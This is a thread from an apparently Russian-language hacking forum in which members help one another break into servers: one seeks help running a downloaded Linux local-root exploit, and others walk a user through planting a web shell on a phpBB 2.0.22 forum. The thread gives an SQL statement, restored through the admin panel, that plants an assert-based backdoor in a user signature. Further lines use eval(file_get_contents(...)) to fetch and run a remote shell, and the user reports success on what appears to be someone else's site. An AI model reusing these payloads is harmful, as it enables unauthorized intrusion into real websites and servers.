Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    всем доброго времени суток.
    вопрос - есть сервер Linux 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686
    скачал скомпилированный эксплойт Krad отсюда http://files.xakep.biz/Local_Root_Exploits/krad
    запускаю ./exploit
    получаю ошибку: [6658: 3] tcsetattr: Invalid argument
    эээ...что не так ?
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    314
    Reputations:
    163
    http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
    http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
     
    1 person likes this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    phpbb 2.0.22, есть админские права ..можно как нить залить шелл ??

    на эту версию ничего не нашел

    http://forum.antichat.ru/thread24488.html
     
    _________________________
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Konqi можно через картинку, но не всегда это работает!
    а можно через восстановление БД:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
    а потом в командной строке в профайле
    &cmd=phpinfo();
    или
    cmd=eval(file_get_contents('http://ххх.ru/down/shell.txt'));
     
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    314
    Reputations:
    163

    https://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    2 GOGA075

    и где ставить этот sql запрос?
     
    _________________________
  7. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Создаешь файл 1.sql пихеш туда этот запрос, топаешь а админку и восстанавливаешь его там!
    потом топаешь в профайл и ...
    profile.php?mode=editprofile&cmd=phpinfo();
    видешь phpinf'у!
    ну а дальше шел...
     
    2 people like this.
  8. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    152
    Likes Received:
    244
    Reputations:
    73
    Делаешь бекап базы,в файл это записываешь,и делаешь восстановление базы,ну или как-то так. :)
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    ok люди Щас папробую ))
     
    _________________________
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    парни сработал спасибо вам :D
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    phpinfo пашет а вот с шелом никак :(

    Parse error: syntax error, unexpected '<' in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code(1) : assert code(1) : eval()'d code on line 1

    Warning: assert() [function.assert]: Assertion "eval(file_get_contents('http://mysite.com/shell.php'));" failed in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code on line 1
     
    _________________________
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Konqi расширение шела не php а txt и только txt!

    eval(file_get_contents('http://mysite.com/shell.txt'));
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    А аплоадить шелл некак? :)
    5 сек дам линк на пост )

    https://forum.antichat.ru/showpost.php?p=1722124&postcount=10463
     
  14. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
    eval(file_get_contents($_GET['e']));
    а потом обращаться
    http://site.com/images/sh.php?e=http://адресс_до_шела

    З.Ы или как Ctacok посоветовал, это проще)
     
    #12774 daniel_1024, 8 May 2010
    Last edited: 8 May 2010
  15. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    И как же этот код на сервер запихнуть?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    GOGA075

    с текстом тоже самое
     
    _________________________
  17. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Ну тут 2 варианта.
    Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    я ни так хорошо понял версию Ctacok

    куда нужно ставить эту форму аплоада ??
     
    _________________________
  19. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    210
    Likes Received:
    10
    Reputations:
    11
    Konqi попробуй через иклуид!
     
    1 person likes this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    GOGA075 ты Эйнштейн. :)

    как можно было забыть такое!! :)

    shell загрузилось без каких либо проблем ;)
     
    _________________________
Loading...
Thread Status:
Not open for further replies.